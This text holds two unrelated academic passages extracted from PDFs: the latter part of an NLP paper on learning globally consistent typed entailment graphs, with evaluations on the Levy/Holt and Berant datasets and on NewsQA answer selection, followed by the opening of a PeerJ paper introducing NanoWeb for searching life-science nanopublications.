predicate and its reverse to handle examples where the argument order of the two predicates are differ- 1010 mappings in total (e.g., animal to living_thing). 11The selected value was usually around 1.5. ent. Additionally, we tried TransE (Bordes et al., 2013), another link prediction method which de- spite of its simplicity, produces very competitive results in knowledge base completion. However, we do not present its full results as they were worse than ConvE.12 PPDB is based on the Paraphrase Database (PPDB) of Pavlick et al. (2015). We accept an example as entailment if it is labeled as a para- phrase or entailment in the PPDB XL lexical or phrasal collections.13 Berant_ILP is based on the entailment graphs of Berant et al. (2011).14 For Berant’s dataset, we directly compared our results to the ones reported in Berant et al. (2011). For Levy/Holt’s dataset, we used publicly available entailment rules derived from Berant et al. (2011) that gives us one point of precision and recall in the plots. While the rules are typed and can be ap- plied in a context sensitive manner, ignoring the types and applying the rules out of context yields much better results (Levy and Dagan, 2016). This is attributable to both the non-standard types used by Berant et al. (2011) and also the general data sparsity issue. In all our experiments, we first test a set of rule-based constraints introduced by Berant et al. (2011) on the examples before the prediction by our methods. In the experiments on Levy/Holt’s dataset, in order to maintain compatibility with Levy and Dagan (2016), we also run the lemma based heuristic process used by them before ap- plying our methods.We do not apply the lemma based process on Berant’s dataset in order to com- pare with Berant et al’s (2011) reported results di- rectly. In experiments with CG_PR and CG, if the typed entailment graph corresponding to an exam- ple does not have one or both predicates, we resort to the average score between all typed entailment graphs. 6 Results and Discussion To test the efficacy of our globally consistent en- tailment graphs, we compare them with the base- line systems in Section 6.1. We test the effect of approximating transitivity constraints in Section 12We also tried the average of GloVe embeddings (Pen- nington et al., 2014) of the words in each predicate, but the results were worse than ConvE. 13We also tested the largest collection (XXXL) , but the precision was very low on Berant’s dataset (below 30%). 14We also tested (Berant et al., 2015), but do not report the results as they are very similar. local untyped AVG CG CG_PR LEVY/HOLT’S dataset BInc .076 .127 .157 .162 .165 Lin .074 .120 .146 .151 .149 Weed .073 .115 .143 .149 .147 ConvE - .112 - - - BERANT’S dataset BInc .138 .167 .144 .177 .179 Lin .147 .158 .172 .186 .189 Weed .146 .154 .171 .184 .187 ConvE - .144 - - - Table 1: Area under precision-recall curve (for pre- cision > 0.5) for different variants of similarity mea- sures: local, untyped, AVG, crossGraph (CG) and crossGraph + pResolution (CG_PR). We report results on two datasets. Bold indicates stat significance (see text). 6.2. Section 6.3 concerns error analysis. 6.1 Globally Consistent Entailment Graphs We test our method using three distributional similarity measures: Weeds similarity (Weeds and Weir, 2003), Lin similarity (Lin, 1998) and Balanced Inclusion (BInc; Szpektor and Dagan, 2008). The first two similarity measures are sym- metric,15 while BInc is directional. Figures 4A and 4B show precision-recall curves of the differ- ent methods on Levy/Holt’s and Berant’s datasets, respectively, using BInc. We show the full curve for BInc as it is directional and on the development portion of Levy/Holt’s dataset, it yields better re- sults than Weeds and Lin. In addition, Table 1 shows the area under the precision-recall curve (AUC) for all variants of the three similarity measures. Note that each method covers a different range of precisions and recalls. We compute AUC for precisions in the range [0.5, 1], because predictions with precision better than random guess are more important for end applications such as question-answering and semantic parsing. For each similarity measure, we tested statistical significance between the methods using bootstrap resampling with 10K experiments (Efron and Tibshirani, 1985; Koehn, 2004). In Ta- ble 1, the best result for each dataset and similarity measure is boldfaced. If the difference of another model with the best result is not significantly dif- ferent with p-value < .05, the second model is also boldfaced. 15Weeds similarity is the harmonic average of Weeds pre- cision and Weeds recall, hence a symmetric measure. (A) Pr ec is io n Recall Recall Levy/Holt’s dataset Berant’s dataset Pr ec is io n (D)(C) (B) Figure 4: Comparison of globally consistent entailment graphs to the baselines on Levy/Holt’s (A) and Berant’s (B) datasets. The results are compared to graphs learned by Forest Reducible Graph Assumption on Levy/Holts’s (C) and Berant’s (D) datasets. Among the distributional similarities based on BInc, BInc_CG_PR outperforms all the other models in both datasets. In comparison to BInc score’s AUC, we observe more than 100% im- provement on Levy/Holt’s dataset and about 30% improvement on Berant’s. Given the consistent gains, our proposed model appears to alleviate the data sparsity and the noise inherent to lo- cal scores. Our method also outperforms PPDB and Berant_ILP on both datasets. The second best performing model is BInc_CG, which im- proves the results significantly, especially on Be- rant’s dataset, over the BInc_AVG (AUC of .177 vs .144). This confirms that learning what subset of entailments should be generalized across differ- ent typed entailment graphs (~β) is effective. The untyped models yield a single large entail- ment graph. It contains (noisy) edges that are not found in smaller typed entailment graphs. Despite the noise, untyped models for all three similarity measures still perform better than the typed ones in terms of AUC. However, they do worse in the high-precision range. For example, BInc_untyped is worse than BInc for precision > 0.85. The AVG models do surprisingly well (only about 0.5 to 3.5 below CG_PR in terms of AUC), but note that only a subset of the typed entailment graphs might have (untyped) predicates p and q of interest (usually not more than 10 typed entailment graphs out of 367 graphs). Therefore, the AVG models are gen- erally expected to outperform the untyped ones (with only one exception in our experiments), as typing has refined the entailments and averaging just improves the recall. Comparison of CG_PR with CG models confirms that explicitly encour- aging paraphrase predicates to have the same pat- terns of entailment is effective. It improves the results for BInc score, which is a directional sim- ilarity measure. We also tested applying the para- phrase resolution soft constraints alone, but the differences with the local scores were not statis- tically significant. This suggests that the para- phrase resolution is more helpful when similarities are transferred between graphs, as this can cause inconsistencies around the predicates with trans- ferred similarities, which are then resolved by the paraphrase resolution constraints. The results of the distributional representations learned by ConvE are worse than most other meth- ods. We attribute this outcome to the fact that a) while entailment relations are directional, these methods are symmetric; b) the learned embed- dings are optimized for tasks other than entailment or paraphrase detection; and c) the embeddings are learned regardless of argument types. How- ever, even the BInc_untyped baseline outperforms ConvE, showing that it is important to use a di- rectional measure that directly models entailment. We hypothesize that learning predicate represen- tations based on the distributional inclusion hy- potheses which do not have the above limitations might yield better results. 6.2 Effect of Transitivity Constraints Our largest graph has 53K nodes, we thus tested approximate methods instead of the ILP to close entailment relations under transitivity (§2). The approximate TNF method of Berant et al. (2011) did not scale to the size of our graphs with moder- ate sparsity parameters. Berant et al. (2015) also present a heuristic method, High-To-Low Forest Reducible Graph (HTL-FRG), which gets slightly better results than TNF on their dataset, and which scales to graphs of the size we work with.16 We applied the HTL-FRG method to the globally consistent similarity scores (BInc_CG_PR_HTL) and changed the threshold on the scores to get a precision-recall curve. Figures 4C and 4D show the results of this method on Levy/Holt’s and Berant’s datasets. Our experiments show, in contrast to the results of Berant et al. (2015), that the HTL-FRG method leads to worse results when applied to our global scores. This result is caused both by the use of heuristic methods in place of globally optimizing via ILP, and by the removal of many valid edges arising from the fact that the FRG assumption is not correct for many real-world domains. 16TNF did not converge after two weeks for threshold δ = .04. For δ = .12 (precisions higher than 80%), it converged, but with results slightly worse than HTL-FRG on both datasets. Error type Example False Positive Spurious correlation (57%) Microsoft released Internet Ex- plorer → Internet Explorer was developed by Microsoft Relation nor- malization (31%) The pain may be relieved by as- pirin → The pain can be treated with aspirin Lemma based process & parsing (12%) President Kennedy came to Texas → President Kennedy came from Texas False Negative Sparsity (93%) Cape town lies at the foot of mountains → Cape town is lo- cated near mountains Wrong label & parsing (7%) Horses are imported from Aus- tralia → Horses are native to Aus- tralia Table 2: Examples of different error categories and relative frequencies. The cause of errors is boldfaced. 6.3 Error Analysis We analyzed 100 false positive (FP) and 100 false negative (FN) randomly selected examples (using BInc_CG_ST results on Levy/Holt’s dataset and at the precision level of Berant_ILP, i.e. 0.76). We present our findings in Table 2. Most of the FN errors are due to data sparsity, but a few errors are due to wrong labeling of the data and parsing er- rors. More than half of the FP errors are because of spurious correlations in the data that are captured by the similarity scores, but are not judged to con- stitute entailment by the human judges. About one third of the FP errors are because of the normal- ization we currently perform on the relations, e.g., we remove modals and auxiliaries. The remain- ing errors are mostly due to parsing and our use of Levy and Dagan’s (2016) lemma based heuristic process. 7 Extrinsic Evaluation To further test the utility of explicit entailment rules, we evaluate the learned rules on an ex- trinsic task: answer selection for machine read- ing comprehension on NewsQA, a dataset that contains questions about CNN articles (Trischler et al., 2017). Machine reading comprehension is usually evaluated by posing questions about a text passage and then assessing the answers of a system (Trischler et al., 2017). The datasets that are used for this task are often in the form of (document,question,answer) triples, where an- The board hailed Romney for his solid credentials. Who praised Mitt Romney’s credentials? Researchers announced this week that they’ve found a new gene, ALS6, which is responsible for . . . Which gene did the ALS association dis- cover ? One out of every 17 children under 3 years old in America has a food allergy, and some will outgrow their sensitivities. How many Americans suffer from food allergies? The reported compromise could itself run afoul of European labor law, opening the way for foreign workers . . . What law might the deal break? . . . Barnes & Noble CEO William Lynch said as he unveiled his company ’s Nook Tablet on Monday. Who launched the Nook Tablet? The report said opium has accounted for more than half of Afghanistan ’s gross domestic product in 2007. What makes up half of Afghanistans GDP ? Table 3: Examples where explicit entailment relations improve the rankings. The related words are boldfaced. swer is a short span of the document. Answer selection is an important task where the goal is to select the sentence(s) that contain the answer. We show improvements by adding knowledge from our learned entailments without changing the graphs or tuning them to this task in any way. Inverse sentence frequency (ISF) is a strong baseline for answer selection (Trischler et al., 2017). The ISF score between a sentence Si and a question Q is defined as ISF(Si,Q) =∑ w∈Si∩Q IDF(w), where IDF(w) is the inverse document frequency of the word w by considering each sentence in the whole corpus as one docu- ment. The state-of-the-art methods for answer se- lection use ISF and by itself it already does quite well (Trischler et al., 2017; Narayan et al., 2018). We propose to extend the ISF score with entail- ment rules. We define a new score ISFEnt(Si,Q) = αISF(Si,Q) + (1 −α)|{r1 ∈ Si,r2 ∈ Q : r1 → r2}|, where α ∈ [0, 1] is a hyper-parameter and r1 and r2 denote relations in the sentence and the ques- tion, respectively. The intuition is that if a sen- tence such as “Luka Modric sustained a fracture to his right fibula” is a paraphrase of or entails the answer of a question such as “What does Luka Modric suffer from?”, it will contain the answer span. We consider an entailment decision be- tween two typed predicates if their global similar- ity BInc_CG_PR is higher than a threshold δ. We also considered entailments between unary relations (one argument) by leveraging our learned binary entailments. We split each binary entail- ment into two potential unary entailments. For example, the entailment visit1,2(:person,:location) → arrive1,in(:person,:location), is split ACC MRR MAP ISF 36.18 48.99 48.57 ISFEnt 37.61 50.06 49.63 Table 4: Results (in percentage) for answer selection on the NewsQA dataset. into visit1(:person) → arrive1(:person) and visit2(:location) → arrivein(:location). We computed unary similarity scores by averaging over all related binary scores. This is particularly helpful when one argument is not present (e.g., adjuncts or Wh questions) or does not exactly match between the question and the answer. We test the proposed answer selection score on NewsQA, a dataset that contains questions about CNN articles (Trischler et al., 2017). The dataset is collected in a way that encourages lexical and syntactic divergence between questions and doc- uments. The crowdworkers who wrote questions saw only a news article headline and its summary points, but not the full article. This process en- courages curiosity about the contents of the full article and prevents questions that are simple re- formulations of article sentences (Trischler et al., 2017). This is a more realistic and suitable setting to test paraphrasing and entailment capabilities. We use the development set of the dataset (5165 samples) to tune α and δ and report results on the test set (5124 examples) in Table 4. We ob- serve about 1.4% improvement in accuracy (ACC) and 1% improvement in Mean Reciprocal Rank (MRR) and Mean Average Precision (MAP), con- firming that entailment rules are helpful for an- swer selection.17 Table 3 shows some of the ex- 17The accuracy results of Narayan et al. (2018) are not consistent with their own MRR and MAP (ACC>MRR in come cases), as they break ties between ISF scores differ- wij = 1(cij > λ1)(cij −λ1)/τij (6) cij = w 0 ij + ∑ (i′,j′)∈N(i,j) β(·)wi′j′ −1(wij > ε)Iε(wji) ∑ k∈V (τ1(i),τ2(i)) [ (wik −wjk)2 + (wki −wkj)2 ] + 2 ∑ k∈V (τ1(i),τ2(i)) Iε(wjk)Iε(wkj)wik + Iε(wik)Iε(wki)wkj (7) τij = 1 + ∑ (i′,j′)∈N(i,j) β(·) + 2 ∑ k∈V (τ1(i),τ2(i)) Iε(wjk)Iε(wkj) + Iε(wik)Iε(wki) (8) β(·) = I0 ( 1 − ( ∑ j∈V (τ1(i),τ2(i)) ∑ (i′,j′)∈N(i,j) (wij −wi′j′ )2 ) /λ2 ) . (9) Figure 5: The update rules for wij and β(·). amples where ISFEnt ranks the correct sentences higher than ISF. These examples are very chal- lenging for methods that do not have entailment and paraphrasing knowledge, and illustrate the se- mantic interpretability of the entailment graphs. We also performed a similar evaluation on the Stanford Natural Language Inference dataset (SNLI; Bowman et al., 2015) and obtained 1% improvement over a basic neural network archi- tecture that models sentences with an n-layered LSTM (Conneau et al., 2017). However, we did not get improvements over the state of the art re- sults because only a few of the SNLI examples re- quire external knowledge of predicate entailments. Most examples require reasoning capabilities such as A∧B → B and simple lexical entailments such as boy → person, which are often present in the training set. 8 Conclusions and Future Work We have introduced a scalable framework to learn typed entailment graphs directly from text. We use global soft constraints to learn globally con- sistent entailment scores for entailment relations. Our experiments show that generalizing in this way across different but related typed entail- ment graphs significantly improves performance over local similarity scores on two standard text- entailment datasets. We show around 100% in- crease in AUC on Levy/Holt’s dataset and 30% on Berant’s dataset. The method also outper- forms PPDB and the prior state-of-the-art entail- ment graph-building approach due to Berant et al. ently when computing ACC compared to MRR and MAP. See also http://homepages.inf.ed.ac.uk/scohen/ acl18external-errata.pdf. (2011). Paraphrase Resolution further improves the results. We have in addition showed the util- ity of entailment rules on answer selection for ma- chine reading comprehension. In the future, we plan to show that the global soft constraints developed in this paper can be extended to other structural properties of entail- ment graphs such as transitivity. Future work might also look at entailment relation learning and link prediction tasks jointly. The entailment graphs can be used to improve relation extrac- tion, similar to Eichler et al. (2017), but cover- ing more relations. In addition, we intend to col- lapse cliques in the entailment graphs to para- phrase clusters with a single relation identifier, and to replace the form-dependent lexical semantics of the CCG parser with these form-independent rela- tions (Lewis and Steedman, 2013a) and to use the entailment graphs to derive meaning postulates for use in tasks such as question-answering and con- struction of knowledge-graphs from text (Lewis and Steedman, 2014). Appendix A Figure 5 shows the update rules of the learning al- gorithm. The global similarity scores wij are up- dated using Eq. 6, where cij and τij are defined in Eq. 7 and Eq. 8, respectively. 1(x) equals 1 if the condition x is satisfied and zero, otherwise. The compatibility functions β(·) are updated using Eq. 9. Acknowledgements We thank Thomas Kober and Li Dong for help- ful comments and feedback on the work, Reg- http://homepages.inf.ed.ac.uk/scohen/acl18external-errata.pdf http://homepages.inf.ed.ac.uk/scohen/acl18external-errata.pdf gie Long for preliminary experiments on ope- nIE extractions, and Ronald Cardenas for provid- ing baseline code for the NewsQA experiments. The authors would also like to thank Katrin Erk and the three anonymous reviewers for their valu- able feedback. This work was supported in part by the Alan Turing Institute under the EPSRC grant EP/N510129/1. The experiments were made possible by Microsoft’s donation of Azure cred- its to The Alan Turing Institute. The research was supported in part by ERC Advanced Fellow- ship GA 742137 SEMANTAX, a Google faculty award, a Bloomberg L.P. Gift award, and a Uni- versity of Edinburgh/Huawei Technologies award to Steedman. Chambers was supported in part by the National Science Foundation under Grant IIS-1617952. Steedman and Johnson were sup- ported by the Australian Research Council’s Dis- covery Projects funding scheme (project number DP160102156). References Omri Abend, Shay B. Cohen, and Mark Steedman. 2014. Lexical Inference over Multi-Word Pred- icates: A Distributional Approach. In Proceed- ings of the 52nd Annual Meeting of the Associa- tion for Computational Linguistics, pages 644– 654. Gabor Angeli, Melvin Johnson Premkumar, and Christopher D. Manning. 2015. Leveraging Linguistic Structure for Open Domain Informa- tion Extraction. In Proceedings of the 53rd An- nual Meeting of the Association for Computa- tional Linguistics, pages 344–354. Jonathan Berant, Noga Alon, Ido Dagan, and Ja- cob Goldberger. 2015. Efficient Global Learn- ing of Entailment Graphs. Computational Lin- guistics, 42:221–263. Jonathan Berant, Ido Dagan, Meni Adler, and Ja- cob Goldberger. 2012. Efficient Tree-Based Approximation for Entailment Graph Learning. In Proceedings of the 50th Annual Meeting of the Association for Computational Linguistics, pages 117–125. Jonathan Berant, Jacob Goldberger, and Ido Da- gan. 2011. Global Learning of Typed Entail- ment Rules. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics, pages 610–619. Kurt Bollacker, Colin Evans, Praveen Paritosh, Tim Sturge, and Jamie Taylor. 2008. Freebase: A Collaboratively Created Graph Database for Structuring Human Knowledge. In Proceedings of the ACM SIGMOD international conference on Management of data, pages 1247–1250. Antoine Bordes, Nicolas Usunier, Alberto Garcia- Duran, Jason Weston, and Oksana Yakhnenko. 2013. Translating Embeddings for Modeling Multi-Relational Data. In Advances in neural information processing systems, pages 2787– 2795. Samuel R. Bowman, Gabor Angeli, Christopher Potts, and Christopher D. Manning. 2015. A Large Annotated Corpus for Learning Natural Language Inference. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 632–642. Alexis Conneau, Douwe Kiela, Holger Schwenk, Loïc Barrault, and Antoine Bordes. 2017. Su- pervised Learning of Universal Sentence Rep- resentations from Natural Language Inference Data. In Proceedings of the Conference on Em- pirical Methods in Natural Language Process- ing, pages 670–680. Ido Dagan, Lillian Lee, and Fernando C.N. Pereira. 1999. Similarity-Based Models of Word Cooccurrence Probabilities. Machine learning, 34(1-3):43–69. Tim Dettmers, Minervini Pasquale, Stenetorp Pontus, and Sebastian Riedel. 2018. Convolu- tional 2D Knowledge Graph Embeddings. In Proceedings of the 32th AAAI Conference on Artificial Intelligence, pages 1811–1818. Li Dong, Jonathan Mallinson, Siva Reddy, and Mirella Lapata. 2017. Learning to Paraphrase for Question Answering. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 875–886. Bradley Efron and Robert Tibshirani. 1985. The Bootstrap Method for Assessing Statistical Ac- curacy. Behaviormetrika, 12(17):1–35. Kathrin Eichler, Feiyu Xu, Hans Uszkoreit, and Sebastian Krause. 2017. Generating Pattern- Based Entailment Graphs for Relation Extrac- tion. In Proceedings of the 6th Joint Confer- ence on Lexical and Computational Semantics (* SEM 2017), pages 220–229. Oren Etzioni, Anthony Fader, Janara Christensen, Stephen Soderland, and Mausam Mausam. 2011. Open Information Extraction: The Sec- ond Generation. In Proceedings of the 22nd In- ternational Joint Conference on Artificial Intel- ligence, pages 3–10. Juri Ganitkevitch, Benjamin Van Durme, and Chris Callison-Burch. 2013. PPDB: The Para- phrase Database. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 758– 764. Maayan Geffet and Ido Dagan. 2005. The Distri- butional Inclusion Hypotheses and Lexical En- tailment. In Proceedings of the 43rd Annual Meeting on Association for Computational Lin- guistics, pages 107–114. Aurélie Herbelot and Mohan Ganesalingam. 2013. Measuring Semantic Content in Distributional Vectors. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics, pages 440–445. Xavier R. Holt. 2018. Probabilistic Models of Relational Implication. Master’s thesis, Mac- quarie University. Dimitri Kartsaklis and Mehrnoosh Sadrzadeh. 2016. Distributional Inclusion Hypothesis for Tensor-based Composition. In Proceedings of the 26th International Conference on Compu- tational Linguistics: Technical Papers, pages 2849–2860. Ross Kindermann and J Laurie Snell. 1980. Markov Random Fields and their Applications, volume 1. American Mathematical Society. Philipp Koehn. 2004. Statistical Significance Tests for Machine Translation Evaluation. In Proceedings of the Conference on Empiri- cal Methods in Natural Language Processing, pages 388–395. Omer Levy and Ido Dagan. 2016. Annotating Re- lation Inference in Context via Question An- swering. In Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics, pages 249–255. Mike Lewis. 2014. Combined Distributional and Logical Semantics. Ph.D. thesis, University of Edinburgh. Mike Lewis and Mark Steedman. 2013a. Com- bined Distributional and Logical Semantics. Transactions of the Association for Computa- tional Linguistics, 1:179–192. Mike Lewis and Mark Steedman. 2013b. Unsu- pervised Induction of Cross-Lingual Semantic Relations. In Proceedings of the Conference on Empirical Methods in Natural Language Pro- cessing, pages 681–692. Mike Lewis and Mark Steedman. 2014. Combin- ing Formal and Distributional Models of Tem- poral and Intensional Semantics. In Proceed- ings of the ACL Workshop on Semantic Parsing, pages 28–32. Dekang Lin. 1998. Automatic Retrieval and Clus- tering of Similar Words. In Proceedings of the 36th Annual Meeting of the Association for Computational Linguistics, pages 768–774. Xiao Ling and Daniel S. Weld. 2012. Fine- Grained Entity Recognition. In Proceedings of the National Conference of the Association for Advancement of Artificial Intelligence, pages 94–100. Shashi Narayan, Ronald Cardenas, Nikos Pa- pasarantopoulos, Shay B. Cohen, Mirella Lap- ata, Jiangsheng Yu, and Yi Chang. 2018. Doc- ument Modeling with External Attention For Sentence Extraction. In Proceedings of the 56th Annual Meeting of the Association for Compu- tational Linguistics, pages 2020–2030. Dat Ba Nguyen, Johannes Hoffart, Martin Theobald, and Gerhard Weikum. 2014. AIDA- light: High-Throughput Named-Entity Disam- biguation. In Workshop on Linked Data on the Web, pages 1–10. Terence Parsons. 1990. Events in the Semantics of English: A Study in Subatomic Semantics. MIT Press, Cambridge, MA. Ellie Pavlick, Pushpendre Rastogi, Juri Gan- itkevitch, Benjamin Van Durme, and Chris Callison-Burch. 2015. PPDB 2.0: Better Para- phrase Ranking, Fine-Grained Entailment Rela- tions, Word Embeddings, and Style Classifica- tion. In Proceedings of the 53rd Annual Meet- ing of the Association for Computational Lin- guistics, pages 425–430. Jeffrey Pennington, Richard Socher, and Christo- pher D. Manning. 2014. GloVe: Global Vec- tors for Word Representation. In Proceedings of the Conference on Empirical Methods in Nat- ural Language Processing, pages 1532–1543. Siva Reddy, Mirella Lapata, and Mark Steed- man. 2014. Large-Scale Semantic Parsing with- out Question-Answer Pairs. Transactions of the Association for Computational Linguistics, 2:377–392. Sebastian Riedel, Limin Yao, Andrew McCallum, and Benjamin M. Marlin. 2013. Relation Ex- traction with Matrix Factorization and Univer- sal Schemas. In Proceedings of the Conference of the North American Chapter of the Associ- ation for Computational Linguistics: Human Language Technologies, pages 74–84. Stefan Schoenmackers, Oren Etzioni, Daniel S. Weld, and Jesse Davis. 2010. Learning First- Order Horn Clauses From Web Text. In Pro- ceedings of the Conference on Empirical Meth- ods in Natural Language Processing, pages 1088–1098. Richard Socher, Danqi Chen, Christopher D. Man- ning, and Andrew Ng. 2013. Reasoning with Neural Tensor Networks for Knowledge Base Completion. In Advances in neural information processing systems, pages 926–934. Mark Steedman. 2000. The Syntactic Process. MIT Press, Cambridge, MA. Idan Szpektor and Ido Dagan. 2008. Learning En- tailment Rules for Unary Templates. In Pro- ceedings of the 22nd International Conference on Computational Linguistics, pages 849–856. Adam Trischler, Tong Wang, Xingdi Yuan, Justin Harris, Alessandro Sordoni, Philip Bachman, and Kaheer Suleman. 2017. NewsQA: A Ma- chine Comprehension Dataset. In Proceedings of the 2nd Workshop on Representation Learn- ing for NLP, pages 191–200. Théo Trouillon, Johannes Welbl, Sebastian Riedel, Éric Gaussier, and Guillaume Bouchard. 2016. Complex Embeddings for Simple Link Pre- diction. In Proceedings of the 33rd Interna- tional Conference on International Conference on Machine Learning, pages 2071–2080. Yushi Wang, Jonathan Berant, and Percy Liang. 2015. Building a Semantic Parser Overnight. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics, pages 1332–1342. Julie Weeds and David Weir. 2003. A Gen- eral Framework for Distributional Similarity. In Proceedings of the Conference on Empiri- cal Methods in Natural Language Processing, pages 81–88. Yangyang Xu and Wotao Yin. 2013. A Block Coordinate Descent Method for Regularized Multiconvex Optimization with Applications to Nonnegative Tensor Factorization and Com- pletion. SIAM Journal on imaging sciences, 6(3):1758–1789. Bishan Yang, Wen-tau Yih, Xiaodong He, Jian- feng Gao, and Li Deng. 2015. Embedding En- tities and Relations for Learning and Inference in Knowledge Bases. In Proceedings of the In- ternational Conference on Learning Represen- tations. Naomi Zeichner, Jonathan Berant, and Ido Dagan. 2012. Crowdsourcing Inference-Rule Evalua- tion. In Proceedings of the 50th Annual Meet- ing of the Association for Computational Lin- guistics, pages 156–160. Congle Zhang and Daniel S. Weld. 2013. Harvest- ing Parallel News Streams to Generate Para- phrases of Event Relations. In Proceedings of the Conference on Empirical Methods in Natu- ral Language Processing, pages 1776–1786. work_4q5hm7aepvhlhh2i7onh5jcije ---- Search, access, and explore life science nanopublications on the Web Search, access, and explore life science nanopublications on the Web Fabio Giachelle, Dennis Dosso and Gianmaria Silvello Department of Information Engineering, University of Padua, Padova, Italy ABSTRACT Nanopublications are Resource Description Framework (RDF) graphs encoding scientific facts extracted from the literature and enriched with provenance and attribution information. There are millions of nanopublications currently available on the Web, especially in the life science domain. Nanopublications are thought to facilitate the discovery, exploration, and re-use of scientific facts. Nevertheless, they are still not widely used by scientists outside specific circles; they are hard to find and rarely cited. We believe this is due to the lack of services to seek, find and understand nanopublications’ content. To this end, we present the NanoWeb application to seamlessly search, access, explore, and re-use the nanopublications publicly available on the Web. For the time being, NanoWeb focuses on the life science domain where the vastest amount of nanopublications are available. It is a unified access point to the world of nanopublications enabling search over graph data, direct connections to evidence papers, and scientific curated databases, and visual and intuitive exploration of the relation network created by the encoded scientific facts. Subjects Data Science, Databases, Digital Libraries Keywords Nanopublication, Scientific data, Graph exploration, Data search, Data citation, Data exploration, Data access INTRODUCTION The scientific world is swiftly becoming data-centric, embracing the principles of the so-called fourth paradigm of science (Hey, Tansley & Tolle, 2009). Data are at the center of scientific discovery as well as of scholarship and scholarly communication (Borgman, 2015). The growing role of data is also witnessed by the ever-increasing importance of data science and related research fields concerning the search (Chapman et al., 2020), provenance (Cheney, Chiticariu & Tan, 2009), citation (Silvello, 2018), re-use (Wynholds et al., 2012), and exploration (Rahman, Jiang & Nandi, 2020) of data. There is no “one size fits all” solution when it comes to data search, access, and re-use given the heterogeneity of data representations and models, interoperability issues, and domain-dependent requirements. In the context of scientific data, the nanopublication model has been proposed to target some of these issues (Groth, Gibson & Velterop, 2010). Nanopublications exploit the Linked Open Data (LOD) principles (Bizer, Heath & Berners-Lee, 2009) to represent scientific facts (assertions hereafter) as self-consistent, independent and machine-readable information tokens. A repository of nanopublications is to be thought of as an open and interconnected knowledge graph seamlessly integrated with the supporting scientific literature. Nanopublications can be used to support How to cite this article Giachelle F, Dosso D, Silvello G. 2021. Search, access, and explore life science nanopublications on the Web. PeerJ Comput. Sci. 7:e335 DOI 10.7717/peerj-cs.335 Submitted 19 June 2020 Accepted 20 November 2020 Published 4 February 2021 Corresponding author Gianmaria Silvello, gianmaria.silvello@unipd.it Academic editor Arkaitz Zubiaga Additional Information and Declarations can be found on page 31 DOI 10.7717/peerj-cs.335 Copyright 2021 Giachelle et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.335 mailto:gianmaria.�silvello@�unipd.�it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.335 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ scientific claims, to explore scientific knowledge by exploiting machine intelligence and as entry points to scientific databases. Hence, this model has been embraced by several scientific fields, especially in the Life Science domain, leading to the creation of more than ten million openly available nanopublications (Kuhn et al., 2018). From the technical viewpoint, a nanopublication is a Resource Description Framework (RDF) graph built around an assertion represented as a triple (subject-predicate-object) and usually extracted, manually or automatically, from a scientific publication. The nanopublication enriches the assertion with provenance and publication information. The RDF representation format enables interoperability and thus the re-use of data, whereas provenance and publication information eases authorship recognition, credit distribution, and citation. As an example taken from the biomedical domain, a nanopublication assertion about a gene-disease association is〈activin A receptor type 2A—gene-disease biomarker association—colorectal cancer〉, where activin A receptor type 2A is the subject, gene-disease biomarker association is the predicate and colorectal cancer is the object of the triple. This assertion is extracted from an article (Campregher et al., 2010), which puts in relation the activin A receptor type 2A gene to the colorectal cancer and describes a drug—that is, Mesalazine—that reduces mutations in transforming growth factor of the gene. In Fig. 1A, we can see a snippet of the RDF nanopublication serialization described above. Nanopublications are defined using the compact TriG (https://www.w3.org/TR/ trig/) syntax, that enables to define prefixes to avoid to re-write the same IRIs multiple times. In Fig. 1A we used some prefixes within the nanopublication assertion, namely: dgn- gda, sio, miriam-gene and lld, that are specific of the life science domain. dgn-gda identifies a DisGeNET (http://rdf.disgenet.org/) gene-disease association; sio identifies a resource from Semanticscience Integrated Ontology (SIO) (https://github.com/MaastrichtU-IDS/ semanticscience), such as the type of a gene-disease association; miriam-gene identifies a gene in the National Center for Biotechnology Information (NCBI) (https://www.ncbi. nlm.nih.gov/) database; lld identifies a resource from the Linked Life Data (http://linkedlifedata.com/) platform for the Biomedical domain. The nanopublication is composed of four parts: (i) the head that acts as a connector between the other three sub-graphs; (ii) the assertion graph (blue) expressing the relationship between the two concepts of the assertion (the gene-disease association), the relationship of the concepts with external ontologies (the fact that activin A receptor type 2A is a gene and colorectal cancer is a disease), and possibly a link towards the scientific database storing related data; (iii) the provenance graph (orange) containing metadata about the assertion such as the methods used to generate the assertion and its creators; and (iv) the publication info graph (yellow) containing the metadata about the evidence paper from which the assertion was extracted and about the nanopublication itself. In Fig. 1B, we can see a graphical representation of the four parts of the nanopublications with a human-readable representation of the gene-disease association encoded by the assertion graph. A key aspect motivating the use of nanopublications is the possibility to exploit LOD features, allowing for exploring relation networks created by connecting related facts Giachelle et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.335 2/35 https://www.w3.org/TR/trig/ https://www.w3.org/TR/trig/ http://rdf.disgenet.org/ https://github.com/MaastrichtU-IDS/semanticscience https://github.com/MaastrichtU-IDS/semanticscience https://www.ncbi.nlm.nih.gov/ https://www.ncbi.nlm.nih.gov/ http://linkedlifedata.com/ http://dx.doi.org/10.7717/peerj-cs.335 https://peerj.com/computer-science/ encoded in RDF. Indeed, nanopublications create a network of scientific assertions that can be explored to discover connections between facts. In the literature, there is important evidence of using nanopublications as a credible approach for expanding scientific insight, especially in the biomedical domain (Chichester et al., 2014). As a motivating example, Fig. 1C shows a small network of gene-disease associations. We can see that the genes activin A receptor type 2A and 5XRCC6P5 are both related to colorectal cancer. If we search for other connections, we find another nanopublication relating the 5XRCC6P5 gene to the malignant neoplasm of breast disease. Further expanding the relation network, we see that there exist two other nanopublications connecting the ABCA2 gene with both colorectal cancer and Malignant neoplasm of breast. Fig. 1C presents a small network that shows the relationships between facts extracted from five different papers published in different venues at different times that do not cite each other. This is just a hint about how exploring Figure 1 (A) RDF (trig) representation of the nanopublication encoding the assertion: (activin A receptor type 2A—gene—disease association—Colorectal Cancer); (B) graphical representation of the four parts of the nanopublications with a human-readable representation of 